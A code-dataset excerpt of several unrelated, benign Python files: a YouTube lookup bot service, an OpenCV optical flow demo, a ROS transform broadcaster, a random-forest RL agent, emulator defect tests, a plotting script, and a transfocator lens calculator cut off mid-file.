UserData\n\nservice = Service(__name__, __doc__)\n\n\n@service.config\nclass Config(Config):\n api_key = config.Field(doc=\"Google API key.\")\n\n\n@service.command(r\"!yt (?P.+?)(?: (?P\\d+))?$\")\n@service.command(r\"youtube search(?: for)? (?P.+?)(?: \\((?P\\d+)\\))?\\??$\", mention=True)\n@background\ndef search(ctx, term, num: int=None):\n \"\"\"\n YouTube search.\n\n Search for the given terms on YouTube. If a number is given, it will display\n that result.\n \"\"\"\n\n r = requests.get(\n \"https://www.googleapis.com/youtube/v3/search\",\n params={\n \"key\": ctx.config.api_key,\n \"part\": \"snippet\",\n \"type\": \"video\",\n \"q\": term\n }\n ).json()\n\n results = r.get(\"items\", [])\n\n if not results:\n ctx.respond(\"Couldn't find anything matching \\\"{term}\\\".\".format(term=term))\n return\n\n if num is None:\n num = 1\n\n num -= 1\n total = len(results)\n\n if num >= total or num < 0:\n ctx.respond(\"Couldn't find anything matching \\\"{term}\\\".\".format(term=term))\n return\n\n r = requests.get(\n \"https://www.googleapis.com/youtube/v3/videos\",\n params={\n \"key\": ctx.config.api_key,\n \"part\": \"statistics\",\n \"id\": results[num][\"id\"][\"videoId\"]\n }\n ).json()\n\n statistics, = r[\"items\"]\n statistics = statistics[\"statistics\"]\n\n ctx.respond(\"({num} of {total}) {title} (+{likes}, {views} views): http://youtu.be/{video_id}\".format(\n title=results[num][\"snippet\"][\"title\"],\n likes=statistics[\"likeCount\"],\n views=statistics[\"viewCount\"],\n video_id=results[num][\"id\"][\"videoId\"],\n num=num + 1,\n total=total\n ))\n\n@service.command(r\".*(?:youtube\\.com/watch.*v=|youtu\\.be/)(?P[a-zA-Z0-9_-]+).*\", priority=-10)\ndef lookup(ctx, video_id):\n \"\"\"\n YouTube video lookup.\n\n Look up stats for pasted YouTube video URLs.\n \"\"\"\n\n r = requests.get(\n \"https://www.googleapis.com/youtube/v3/videos\",\n params={\n \"key\": ctx.config.api_key,\n \"part\": \"snippet,statistics,contentDetails\",\n \"fields\": \"items\",\n \"id\": video_id\n }\n ).json()\n\n if not r[\"items\"]:\n return\n\n r, = r[\"items\"]\n duration = r[\"contentDetails\"][\"duration\"].lower().replace(\"p\", \"\").replace(\"t\", \"\")\n ctx.message(\"\\x02YouTube:\\x02 {title} ({duration}, +{likes}, {views} views)\".format(\n title=r[\"snippet\"][\"title\"],\n duration=duration,\n likes=r[\"statistics\"].get('likeCount', '0'),\n views=r[\"statistics\"][\"viewCount\"],\n ))\n\n","sub_path":"kochira/services/web/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"219319854","text":"# The original code taken from https://docs.opencv.org/3.4/d7/d8b/tutorial_py_lucas_kanade.html\n\nimport cv2 as cv\nimport numpy as np\nimport sys\nfrom pathlib import Path\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) < 2:\n cap = cv.VideoCapture(0)\n else:\n if Path(sys.argv[1]).is_file():\n file_name = sys.argv[1]\n cap = cv.VideoCapture(file_name) # Capture video from camera\n\n ret, frame1 = cap.read()\n prvs = cv.cvtColor(frame1, cv.COLOR_BGR2GRAY)\n hsv = np.zeros_like(frame1)\n hsv[..., 1] = 255\n\n while True:\n ret, frame2 = cap.read()\n if not ret: break\n next = cv.cvtColor(frame2, cv.COLOR_BGR2GRAY)\n\n # prev, next, flow, pyr_scale, levels, winsize, iterations, poly_n, poly_sigma, flags\n flow = cv.calcOpticalFlowFarneback(prvs, next, None, 0.5, 2, 15, 7, 5, 1.1, 0)\n mag, ang = cv.cartToPolar(flow[..., 0], flow[..., 1])\n vert = ang % (np.pi / 2.0)\n vert = vert < (np.pi / 16.)\n hsv[..., 0] = ang * 180 / np.pi\n nmag = cv.normalize(mag, None, 0, 255, cv.NORM_MINMAX)\n nmag[vert] = 0.0\n hsv[..., 2] = cv.normalize(mag, None, 0, 255, cv.NORM_MINMAX)\n\n bgr = cv.cvtColor(hsv, cv.COLOR_HSV2BGR)\n\n cv.imshow('frame2', bgr)\n k = cv.waitKey(5) & 0xff\n if k == 27:\n break\n elif k == ord('s'):\n cv.imwrite('opticalfb.png', frame2)\n cv.imwrite('opticalhsv.png', bgr)\n prvs = next\n\n cap.release()\n cv.destroyAllWindows()\n","sub_path":"video_and_trackers/dense_optical_flow_script.py","file_name":"dense_optical_flow_script.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"336102266","text":"#!/usr/bin/env python\n\nimport rospy\nimport math\nimport tf\nfrom geometry_msgs.msg import PoseStamped\n\nclass transformer:\n\tpose = PoseStamped()\n\n\tdef __init__(self, *args):\t\t\n\t\trospy.init_node('main')\n\t\trospy.Subscriber('/mavros/local_position/pose', PoseStamped, self.pose_callback, queue_size=1)\n\t\tself.tf_broadcaster_ = tf.TransformBroadcaster()\n\t\tprint(\"Initialization Completed\")\n\t\n\tdef euler_boundary(self, angle):\n\t\tif angle >= 3.1415:\n\t\t\treturn angle - 6.283\n\t\telif angle < -3.1415:\n\t\t\treturn angle + 6.283\n\t\telse :\n\t\t\treturn angle\n\n\tdef pose_callback(self, pose):\n\t\tself.pose = pose\n\n\tdef conversion(self):\n\t\trpy = tf.transformations.euler_from_quaternion([self.pose.pose.orientation.x,\n\t\t\t\t\t\t\t\t\t\t\t\t \t\tself.pose.pose.orientation.y,\n\t\t\t\t\t\t\t\t\t\t\t\t \t\tself.pose.pose.orientation.z,\n\t\t\t\t\t\t\t\t\t\t\t\t \t\tself.pose.pose.orientation.w])\n\t\t#print(\"E\",self.euler_boundary(rpy[0]),\" \",self.euler_boundary(rpy[1]),\" \",self.euler_boundary(rpy[2]))\n\t\t#transform quaternion to euler angle just in case you want to rotate your robot model\n\t\tq = tf.transformations.quaternion_from_euler(self.euler_boundary(rpy[0]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t self.euler_boundary(rpy[1]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t self.euler_boundary(rpy[2]))\n\t\tself.tf_broadcaster_.sendTransform((self.pose.pose.position.x, self.pose.pose.position.y, self.pose.pose.position.z), \n\t\t\t\t\t\t\t\t\t\t q,\n\t\t\t\t\t\t\t\t\t\t\trospy.Time.now(),\n\t\t\t\t\t\t\t\t\t\t\t'robot_link',\n\t\t\t\t\t\t\t\t\t\t\t'map')\n\t\t\n\nif __name__ == '__main__':\n\n\tmiddle_man = transformer()\n\trate = rospy.Rate(10)\n\twhile not rospy.is_shutdown():\n\t\ttry:\n\t\t\tmiddle_man.conversion()\n\t\t\t#middle_man.rebroadcast()\n\t\texcept (tf.ConnectivityException, tf.ExtrapolationException):\n\t\t\tcontinue\n","sub_path":"script/pose_to_tf.py","file_name":"pose_to_tf.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"55384457","text":"from bin import Parameter\nimport numpy as np\nfrom numpy.random import choice, random\nimport os\nfrom bin.Util import normalization\nfrom sklearn.ensemble import RandomForestRegressor\n\nclass Agent:\n def __init__(self, PnumActions, epsilon, inputDim, algorithm, Parrallel):\n self.projectionFunction = None\n self.loss = []\n self.Actions = list(np.arange(0, PnumActions, 1, np.int))\n self.p = list(np.ones((PnumActions,)) * (1.0 / PnumActions))\n self.numActions = PnumActions\n self.epsilon = epsilon\n self.algorithm = algorithm\n self.incrementalGain = (Parameter.vmax - Parameter.vmin) / (Parameter.numAtoms - 1)\n self.distribution = np.arange(Parameter.vmin, Parameter.vmax + 1, self.incrementalGain, np.float)\n self.TrainFunction = None\n self.Forest = None\n # testing Block: TrainFunction\n if algorithm == \"fitted_Q\":\n self.initialValue = 0\n if Parrallel:\n self.Forest = RandomForestRegressor(n_estimators=10, max_features=Parameter.svdDim, min_samples_split=3,\n min_samples_leaf=5, n_jobs=10)\n else:\n self.Forest = None\n elif algorithm == \"DRL\":\n self.initialValue = []\n import scipy.stats\n GaussianDist = scipy.stats.norm(0, 200)\n for i in range(Parameter.numAtoms):\n self.initialValue.append(GaussianDist.pdf(self.distribution[i]))\n self.initialValue = normalization(self.initialValue)\n self.initialValue = np.expand_dims(a=self.initialValue, axis=0)\n self.Forests = []\n self.proj_fun = None\n self.genNextState = None\n for i in range(Parameter.numAtoms):\n self.Forests.append(RandomForestRegressor(n_estimators=10, max_features=Parameter.svdDim,\n min_samples_split=3,\n min_samples_leaf=3, n_jobs=30))\n\n def SaveWeight(self, epoch):\n dir = os.path.abspath(os.getcwd())\n if self.algorithm == \"fitted_Q\":\n if self.Forest is None:\n Exception(\"Forest is not built\")\n import pickle\n if not os.path.exists(dir + \"/observations/Epoch \" + str(epoch)):\n os.makedirs(dir + \"/observations/Epoch \" + str(epoch))\n with open(file=dir + \"/observations/Epoch \" + str(epoch) + \"/model.sav\", mode=\"wb\") as f:\n pickle.dump(self.Forest, f)\n elif self.algorithm == \"DRL\":\n if self.Forests is None:\n Exception(\"Forests is not built\")\n import pickle\n if not os.path.exists(dir + \"/observations/Epoch \" + str(epoch)):\n os.makedirs(dir + \"/observations/Epoch \" + str(epoch))\n for i in range(Parameter.numAtoms):\n with open(file=dir + \"/observations/Epoch \" + str(epoch) + \"/model\" + str(i) + \".sav\", mode=\"wb\") as f:\n pickle.dump(self.Forests[i], f)\n\n def LoadWeight(self, epoch):\n dir = os.path.abspath(os.getcwd())\n if self.algorithm == \"fitted_Q\":\n import pickle\n if os.path.exists(dir + \"/observations/Epoch \" + str(epoch) + \"/model.sav\"):\n with open(file=dir + \"/observations/Epoch \" + str(epoch) + \"/model.sav\", mode=\"rb\") as f:\n self.Forest = pickle.load(f)\n Param = self.Forest.get_params()\n Param['n_jobs'] = 1\n self.Forest.set_params(**Param)\n else:\n Exception(\"The weight file does not exist!\")\n elif self.algorithm == \"DRL\":\n import pickle\n for i in range(Parameter.numAtoms):\n if os.path.exists(dir + \"/observations/Epoch \" + str(epoch) + \"/model\" + str(i) + \".sav\"):\n with open(file=dir + \"/observations/Epoch \" + str(epoch) + \"/model\" + str(i) + \".sav\", mode=\"rb\") as f:\n self.Forests[i] = pickle.load(f)\n Param = self.Forests[i].get_params()\n Param['n_jobs'] = 1\n self.Forests[i].set_params(**Param)\n else:\n Exception(\"The weight file does not exist!\")\n\n def getGreedyAction(self, state):\n input = np.transpose(a=state, axes=[1, 0])\n expectedActions = []\n for a in self.Actions:\n A = np.ones(shape=(1, 1)) * a\n t = np.concatenate([input, A], axis=-1)\n if self.algorithm == \"fitted_Q\":\n expectedActions.append(self.Forest.predict(X=t)[0])\n elif self.algorithm == \"DRL\":\n tmpdistribution = []\n for i in range(Parameter.numAtoms):\n tmpdistribution.append(self.Forests[i].predict(X=t)[0])\n tmpdistribution = np.array(tmpdistribution)\n score = np.sum(a=tmpdistribution * self.distribution, axis=0)\n expectedActions.append(score)\n expectedActions = np.array(expectedActions)\n aid = np.argmax(a=expectedActions, axis=-1)\n return aid\n\n def projection(self):\n import keras.backend as K\n import tensorflow as tf\n reward = K.placeholder(shape=(None,), dtype='float64')\n Pro_Dis = K.placeholder(shape=(None, Parameter.numAtoms), dtype='float64')\n m_prob = K.zeros(shape=(tf.shape(reward)[0], Parameter.numAtoms), dtype='float64')\n for j in range(Parameter.numAtoms):\n Tz = K.cast(x=K.minimum(x=K.cast(x=Parameter.vmax, dtype=\"float64\"),\n y=K.maximum(x=K.cast(x=Parameter.vmin, dtype=\"float64\"),\n y=K.cast(x=reward + Parameter.gamma * self.distribution[j],\n dtype=\"float64\"))),\n dtype='float64')\n bj = (Tz - Parameter.vmin) / self.incrementalGain\n m_l, m_u = tf.math.floor(bj), tf.math.ceil(bj)\n\n m_l_id = K.reshape(x=K.cast(x=m_l, dtype='int64'), shape=(-1, 1))\n m_u_id = K.reshape(x=K.cast(x=m_u, dtype='int64'), shape=(-1, 1))\n temp = K.reshape(x=K.arange(0, K.shape(reward)[0], 1, dtype='int64'), shape=(-1, 1))\n index_m_l = K.concatenate([temp, m_l_id], axis=-1)\n index_m_u = K.concatenate([temp, m_u_id], axis=-1)\n cond = K.equal(x=m_u, y=0)\n m_u = K.cast(x=cond, dtype='float64') + m_u\n tmp1 = Pro_Dis[:, j] * (m_u - bj)\n tmp2 = Pro_Dis[:, j] * (bj - m_l)\n m_prob = m_prob + tf.scatter_nd(indices=index_m_l, updates=tmp1,\n shape=K.cast(x=(K.shape(reward)[0], Parameter.numAtoms), dtype='int64'))\n m_prob = m_prob + tf.scatter_nd(indices=index_m_u, updates=tmp2,\n shape=K.cast(x=(K.shape(reward)[0], Parameter.numAtoms), dtype='int64'))\n return K.function([reward, Pro_Dis], [m_prob])\n\n def getAction(self, state):\n if state is None or random() < self.epsilon:\n return self.getRandomAction()\n return self.getGreedyAction(state=state)\n\n def getRandomAction(self):\n return choice(a=list(self.Actions), p=list(self.p), size=1)[0]\n\n def generateNextState(self):\n import keras.backend as K\n import tensorflow as tf\n ExpDistsForEachAction = K.placeholder(shape=(None, self.numActions, Parameter.numAtoms), dtype='float64')\n ExpDists = ExpDistsForEachAction * self.distribution\n Score = K.sum(x=ExpDists, axis=-1)\n BestActions = K.argmax(x=Score, axis=-1)\n BestAids = K.expand_dims(x=BestActions, axis=1)\n idx = K.arange(0, K.shape(Score)[0], 1, dtype=\"int64\")\n idx1 = K.expand_dims(x=idx, axis=1)\n indices = K.concatenate([idx1, BestAids], axis=-1)\n maxProbDist = tf.gather_nd(params=ExpDistsForEachAction, indices=indices)\n return K.function([ExpDistsForEachAction], [maxProbDist])\n\n def Train_And_Update(self, data, epoch, pool):\n self.TrainInFit(data=data, epoch=epoch, pool=pool)\n\n def TrainInFit(self, data, epoch, pool):\n data = np.array(data)\n randidx = np.arange(0, len(data), 1, np.int)\n from numpy.random import shuffle\n shuffle(randidx)\n StartStateSet = data[:, 0][randidx]\n actionSet = data[:, 1][randidx]\n rewardSet = data[:, 2][randidx]\n EndStateSet = data[:, 3][randidx]\n actionSet = np.expand_dims(a=actionSet, axis=1)\n StartStateSet = np.array(list(StartStateSet))\n StartStateSet = np.squeeze(a=StartStateSet, axis=-1)\n EndStateSet = np.array(list(EndStateSet))\n EndStateSet = np.squeeze(a=EndStateSet, axis=-1)\n trainX0 = np.concatenate([StartStateSet, actionSet], axis=-1)\n if self.algorithm == \"fitted_Q\":\n initialValue = np.zeros((len(trainX0),))\n self.Forest.fit(trainX0, initialValue)\n elif self.algorithm == \"DRL\":\n from bin.MultiProcessSimulation import MultiProcessTrainingForest\n if self.proj_fun is None:\n self.proj_fun = self.projection()\n if self.genNextState is None:\n self.genNextState = self.generateNextState()\n initialValue = np.repeat(a=self.initialValue, repeats=len(trainX0), axis=0)\n self.ParallelTrain(trainX=trainX0, labelY=initialValue, pool=pool)\n print(\"Training:\" + str(6 * (epoch * 0.6 + 1)) + \"epochs\")\n for e in range(min(int(6 * (epoch * 0.6 + 1)), Parameter.maxEpochs)):\n ExpValue1 = []\n for a in self.Actions:\n act = np.ones(shape=(len(EndStateSet), 1)) * a\n trainX1 = np.concatenate([EndStateSet, act], axis=-1)\n expValue1 = self.Predict(X=trainX1, pool=pool)\n ExpValue1.append(expValue1)\n if self.algorithm == \"fitted_Q\":\n ExpValue1 = np.transpose(a=ExpValue1, axes=[1, 0])\n maxValue1 = np.max(a=ExpValue1, axis=-1)\n labelValue0 = rewardSet + Parameter.gamma * maxValue1\n self.Forest.fit(trainX0, labelValue0)\n elif self.algorithm == \"DRL\":\n ExpDist = np.transpose(a=ExpValue1, axes=[1, 0, 2])\n maxProbDist = self.genNextState([ExpDist])[0]\n labelDist = self.proj_fun([rewardSet, maxProbDist])[0]\n labelDist = normalization(labelDist)\n self.ParallelTrain(trainX=trainX0, labelY=labelDist, pool=pool)\n\n print(\"Finishing Training\")\n\n def ParallelTrain(self, trainX, labelY, pool):\n args1 = []\n for i in range(Parameter.numAtoms):\n args1.append([trainX, labelY[:, i], self.Forests[i], i])\n from bin.MultiProcessSimulation import MultiProcessTrainingForest\n outputs = pool.map(func=MultiProcessTrainingForest, iterable=args1)\n for forest, idx in outputs:\n self.Forests[idx] = forest\n\n def Predict(self, X, pool):\n if self.algorithm == \"fitted_Q\":\n return self.Forest.predict(X)\n elif self.algorithm == \"DRL\":\n args = []\n for i in range(Parameter.numAtoms):\n args.append([X, self.Forests[i], i])\n from bin.MultiProcessSimulation import MultiPredict\n outputs = pool.map(func=MultiPredict, iterable=args)\n value = []\n for i in range(Parameter.numAtoms):\n for output in outputs:\n if output[1] == i:\n value.append(output[0])\n value = np.transpose(a=value, axes=[1, 0])\n value = normalization(value)\n return value\n\n def TrainInFitBypsrModel(self, data, epoch, pool, psrModel):\n data = np.array(data)\n randidx = np.arange(0, len(data), 1, np.int)\n from numpy.random import shuffle\n shuffle(randidx)\n StartStateSet = data[:, 0][randidx]\n actionSet = data[:, 1][randidx]\n rewardSet = data[:, 2][randidx]\n EndStateSet = data[:, 3][randidx]\n actionSet = np.expand_dims(a=actionSet, axis=1)\n StartStateSet = np.array(list(StartStateSet))\n StartStateSet = np.squeeze(a=StartStateSet, axis=-1)\n EndStateSet = np.array(list(EndStateSet))\n EndStateSet = np.squeeze(a=EndStateSet, axis=-1)\n trainX0 = np.concatenate([StartStateSet, actionSet], axis=-1)\n if self.algorithm == \"fitted_Q\":\n initialValue = np.zeros((len(trainX0),))\n self.Forest.fit(trainX0, initialValue)\n elif self.algorithm == \"DRL\":\n from bin.MultiProcessSimulation import MultiProcessTrainingForest\n if self.proj_fun is None:\n self.proj_fun = self.projection()\n if self.genNextState is None:\n self.genNextState = self.generateNextState()\n initialValue = np.repeat(a=self.initialValue, repeats=len(trainX0), axis=0)\n self.ParallelTrain(trainX=trainX0, labelY=initialValue, pool=pool)\n print(\"training:\" + str(6 * (epoch * 0.6 + 1)) + \"epoches\")\n for e in range(min(int(6 * (epoch * 0.6 + 1)), Parameter.maxEpochs)):\n ExpValue1 = []\n for a in self.Actions:\n act = np.ones(shape=(len(EndStateSet), 1)) * a\n trainX1 = np.concatenate([EndStateSet, act], axis=-1)\n expValue1 = self.Predict(X=trainX1, pool=pool)\n ExpValue1.append(expValue1)\n if self.algorithm == \"fitted_Q\":\n ExpValue1 = np.transpose(a=ExpValue1, axes=[1, 0])\n maxValue1 = np.max(a=ExpValue1, axis=-1)\n labelValue0 = rewardSet + Parameter.gamma * maxValue1\n self.Forest.fit(trainX0, labelValue0)\n elif self.algorithm == \"DRL\":\n ExpDist = np.transpose(a=ExpValue1, axes=[1, 0, 2])\n maxProbDist = self.genNextState([ExpDist])[0]\n labelDist = self.proj_fun([rewardSet, maxProbDist])[0]\n labelDist = normalization(labelDist)\n self.ParallelTrain(trainX=trainX0, labelY=labelDist, pool=pool)\n print(\"Finishing Training\")","sub_path":"bin/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":14395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"526617128","text":"#------------------------------------------------------------------------------\n# Mach-8: The Virtual Machinery Playpen \n#\n# blackchip.org, Inspired by the Vintage Computer Club. \n# All rites reversed (K) 2011, Reprint what you like.\n#\n# $Id: test_mach8_3_2_2.py 148 2012-03-22 02:29:57Z mcgann $\n#------------------------------------------------------------------------------\nfrom mach8 import monitor\nfrom mach8.assembly import *\nfrom mach8_test import suite\nfrom mach8_test.harness import execution\n\nclass TestDefects_3_2_2(execution.TestHarness):\n \n def test_meta_cleared(self):\n \"\"\"\n === Defect ===\n Incorrect disassembly display when assembling demo segment after \n asm.fib was loaded. \n \n === Steps to reproduce ===\n l('asm.fib')\n a.position = 0x2000 \n a(ldx_imm, 0x00) \n a(ldy_imm, 0x30) \n a(jsr, 'STROUT') \n a(rts)\n d(0x2000, 0x2007) \n\n === Incorrect output === \n PROGRAM_START:\n $2000: a2 00 ldx #$00\n $2002: a0 30 ldy #fib.acc\n $2004: 20 15 07 jsr STROUT\n $2007: 60 rts\n \n === Correct output === \n $2002: a0 30 ldy #$30\n \n === Reason ===\n Assembler does not set _new_position to True when PC advanced during\n a normal assembly operation. \n \"\"\"\n\n from asm import fib\n a = self.a\n fib.assemble(a) \n \n a.position = 0x2000 \n a(ldx_imm, 0x00) \n a(ldy_imm, 0x30) \n a(jsr, 'STROUT') \n a(rts)\n \n result = self.d.dump(0x2000, 0x2007)\n lines = result.splitlines()\n self.assertEquals('$2002: a0 30 ldy #$30', lines[2].lstrip())\n\n def test_clear_binary_flag_on_load(self):\n \"\"\"\n === Defect ===\n Programs may raise an InvalidBCDNumberError trap after running \n 'asm.fib'\n \n === Steps to reproduce ===\n mach8> l('asm.fib')\n mach8> r\n mach8> l('asm.hello')\n mach8> r\n \n === Incorrect execution ===\n InvalidBCDNumberError trap raised. \n \n === Correct execution ===\n Prints 'Hello world!'\n \n === Reason ===\n D flag needs to be cleared when loading a new program. Corrective\n action for now is to clear the flag at the end of asm.fib, but this\n needs to be fixed later. A bug in the test suite is preventing proper\n testing at the moment. \n \"\"\"\n suite.banner(self.test_clear_binary_flag_on_load) \n \n sh = monitor.Shell(self.comp) \n sh.l('asm.fib')\n sh.r()\n sh.l('asm.hello')\n sh.r()\n \n def test_d_flag_cleared_on_reset(self):\n \"\"\"\n === Defect === \n An InvalidBCDNumberError trap raised on reset if D flag is set. \n \n === Steps to reproduce ===\n mach8> cpu.d = True\n mach8> z\n \n === Reason ===\n Flag must be cleared in the initialization routines. \n \"\"\"\n suite.banner(self.test_d_flag_cleared_on_reset)\n \n self.cpu.d = True\n self.run_test() \n \n \n \n\n\n","sub_path":"tests/mach8_test/defects/test_mach8_3_2_2.py","file_name":"test_mach8_3_2_2.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"585003403","text":"import configs\nfrom modules.agent import AgentModule\nfrom modules.game import GameModule\nimport torch\nimport numpy as np\n\nagent = torch.load('latest.pt')\nagent.train(False)\n\nfor i in range(10):\n agent.reset()\n\n config = configs.default_game_config._replace(batch_size=1)\n\n num_agents = np.random.randint(2, 3+1)\n num_landmarks = np.random.randint(3, 3+1)\n game = GameModule(config, num_agents, num_landmarks)\n\n _, timesteps = agent(game)\n\n '''\n This visualizes the trajectories of agents (circles) and target locations (crosses).\n It also displays the communication symbol usage. Basically, alpha channel of a letter represents\n how much the the agent was using the i-th symbol during the epoch (on each step\n communication is done by a [1, 20] float vector). I sum all these vectors through all steps.\n '''\n import matplotlib.pyplot as plt\n fig, ax = plt.subplots()\n ax.set_xticks([])\n ax.set_yticks([])\n colors = ['red', 'green', 'blue']\n agent_markers = ['o', '^']\n landmark_markers = ['P', '*']\n utterances = np.zeros_like(timesteps[0]['utterances'][0].detach())\n for time, timestep in enumerate(timesteps):\n agent_legends = []\n for idx, point in enumerate(timestep['locations'][0][:num_agents]):\n agent_legends.append(\n plt.scatter(*list(point.detach().numpy()), \n color=colors[int(game.physical[0, idx, 0].item())], \n marker=agent_markers[int(game.physical[0, idx, 1].item())],\n s=20, alpha=0.75)\n )\n for idx, point in enumerate(timestep['locations'][0][-num_landmarks:]):\n if time == 0:\n plt.scatter(*list(point.detach().numpy()), \n color='dark'+colors[int(game.physical[0, idx, 0].item())], \n marker=landmark_markers[int(game.physical[0, idx, 1].item())],\n s=300, alpha=0.75)\n utterances = utterances + timestep['utterances'][0].detach().numpy()\n # this controls how much we highlight or supress non-freqent symbol when displaying\n # pow < 1 helps to bring in the low freqent symbols that were emitted once and lost in sum\n # pow >=1 can highlight some important symbols through the epoch if it is too noisy\n utterances = np.power(utterances / utterances.max(axis=1)[..., np.newaxis], 0.25)\n for agent_idx in range(utterances.shape[0]):\n for symbol_idx in range(utterances.shape[1]):\n plt.text(0, 1 + 0.01 + 0.05 * agent_idx, str(agent_idx + 1) + ': ',\n color=colors[int(game.physical[0, agent_idx, 0].item())],\n transform=ax.transAxes)\n plt.text(0.05 + 0.03 * symbol_idx, 1 + 0.01 + 0.05 * agent_idx, \n 'ABCDEFGHIJKLMNOPQRSTUVXYZ1234567890'[symbol_idx], \n alpha=utterances[agent_idx, symbol_idx], \n color=colors[int(game.physical[0, agent_idx, 0].item())],\n transform=ax.transAxes)\n plt.legend(reversed(agent_legends), reversed([str(i + 1) for i in range(len(agent_legends))]),\n bbox_to_anchor=(0, 1.15))\n plt.show()","sub_path":"old_code/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"513268446","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport atexit\nimport inspect\nimport logging\n\nfrom .conf import settings\nfrom . import util, exceptions\n\n\n# =============================================================================\n# CONFIGURATION\n# =============================================================================\n\nclass PipelineSetup(object):\n\n @staticmethod\n def __new__(cls, *args, **kwargs):\n if not hasattr(cls, \"_instance\"):\n cls._instance = super(\n PipelineSetup, cls).__new__(cls, *args, **kwargs)\n return cls._instance\n\n def default_setup(self):\n logging.basicConfig(format=settings.LOG_FORMAT)\n\n level = settings.LOG_LEVEL\n\n logging.getLogger(\"Corral\").setLevel(level)\n\n # http://docs.sqlalchemy.org/en/rel_1_0/core/engines.html\n logging.getLogger('sqlalchemy.engine').setLevel(level)\n for k, v in logging.Logger.manager.loggerDict.items():\n if isinstance(v, logging.Logger):\n if k.startswith(\"alembic\"):\n v.setLevel(level)\n\n def setup(self):\n self.default_setup()\n\n def teardown(self):\n pass # pragma: no cover\n\n\n# =============================================================================\n# FUNC\n# =============================================================================\n\ndef load_pipeline_setup():\n import_string = settings.PIPELINE_SETUP\n cls = util.dimport(import_string)\n if not (inspect.isclass(cls) and issubclass(cls, PipelineSetup)):\n msg = (\n \"PIPELINE_SETUP '{}' must be subclass of \"\n \"'corral.pipeline.PipelineSetup'\").format(import_string)\n raise exceptions.ImproperlyConfigured(msg)\n return cls\n\n\ndef setup_pipeline(setup_cls):\n if not (inspect.isclass(setup_cls) and\n issubclass(setup_cls, PipelineSetup)):\n msg = (\n \"PIPELINE_SETUP '{}' must be subclass of \"\n \"'corral.pipeline.PipelineSetup'\").format(setup_cls)\n raise TypeError(msg)\n st = setup_cls()\n st.setup()\n atexit.register(st.teardown)\n","sub_path":"corral/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"328686387","text":"\n\nimport numpy as np\nimport itertools\nimport logging\nfrom transfocate.lens import Lens\nfrom transfocate.lens import LensConnect\n\n\nlogger = logging.getLogger(__name__)\n\nclass TransfocatorCombo(object):\n \"\"\"Class creates and keeps track of the lens array lists and calculates the\n image of the combined xrt/tfs beryllium lens array\n\n Attributes\n ----------\n xrt : list\n A list of the xrt lenses with all the attributes of the LensConnect\n class\n tfs : list\n A list of the tfs lenses with all the attributes of the LensConnect\n class\n \"\"\"\n #define TransfocatorCombo attributes\n #Note: onely one xrt can be entered for this but multiple tfs lenses can be\n #entered\n def __init__(self, xrt, tfs):\n self.xrt=LensConnect(xrt)\n self.tfs=LensConnect(*tfs)\n\n def image(self, z_obj):\n \"\"\"Method calculates the image of the combined tfs and xrt lens array\n \n Returns\n -------\n float\n Returns the image of the xrt/tfs lens array\n \"\"\"\n #\n xrt_image=self.xrt.image(z_obj)\n total_image=self.tfs.image(xrt_image)\n logger.debug(\"the xrt image of the array is %s and the image of the combined xrt/tfs array is %s\" %(xrt_image,total_image))\n return total_image\n\n\nclass Calculator(object):\n \"\"\"Class for the transfocator beryllium lens calculator.\n\n Attributes\n ----------\n xrt_lenses : list\n A list of the xrt prefocus lenses\n tfs_lenses : list\n A list of the beryllium transfocator lenses\n xrt_limit : float \n The hard limit i.e. minimum effective radius that the xrt lens array can safely\n have\n tfs : float\n The hard limit i.e. maximum effective radius that tfs lense array can\n safely have\n \"\"\"\n #Define calculator variables\n #There are not xtr or tfs limits unless they are set by the signals\n def __init__(self, xrt_lenses, tfs_lenses, xrt_limit=None, tfs_limit=None):\n self.xrt_lenses=xrt_lenses\n self.tfs_lenses=tfs_lenses\n self.xrt_limit=xrt_limit\n self.tfs_limit=tfs_limit\n\n @property\n def combinations(self):\n #Note: all lens arrays will consist of one prefocus lens and an array\n #of tfs lenses\n \n \"\"\"Method calculates and returns all possible combinations of the xrt\n and tfs lense arrays\n\n Returns\n -------\n list\n Returns a list of all possible combinations of the xrt and tfs\n lense arrays\n \"\"\"\n \n #create empty lists for all possible xrt and tfs combos and all possible tfs combos\n #xrt lenses put into prefocus\n all_combo=[]\n prefocus_combo=self.xrt_lenses\n tfs_combo=[]\n\n #loop through tfs lenses from i=0 to i=length of tfs list +1\n for i in range(len(self.tfs_lenses)+1):\n #create a list z of all possile tfs lens combinations using\n #itertools\n z=list(itertools.combinations(self.tfs_lenses,i))\n #loop through the combinations in z from index=0 to index= length\n #of z \n for index in range(len(z)):\n #append the combinations into tfs_combo\n #if len(z.lens)<=4:\n tfs_combo.append(z[index])\n logger.debug(\"length of the tfs combinations array %s\"%(len(tfs_combo)))\n \n #loop through all the prefocus lenses\n for prefocus in prefocus_combo:\n #loop through the combinations of tfs and prefocus lenses\n for combo in tfs_combo:\n #add the lens combinations as TransfocatorCombos so that we are\n #keeping track of lists of lenses instead of lists of lists\n all_combo.append(TransfocatorCombo(prefocus,combo))\n \n logger.debug(\"Length of the list of all combinations %s\"%(len(all_combo)))\n return all_combo \n \n def find_combinations(self, target_image, n=4, z_obj=0.0, use_limits=True):\n \"\"\"Method finds all possible xrt/tfs lens combinations and calculates the xrt/tfs lens arrays with the smallest error\n from the user's desired setting 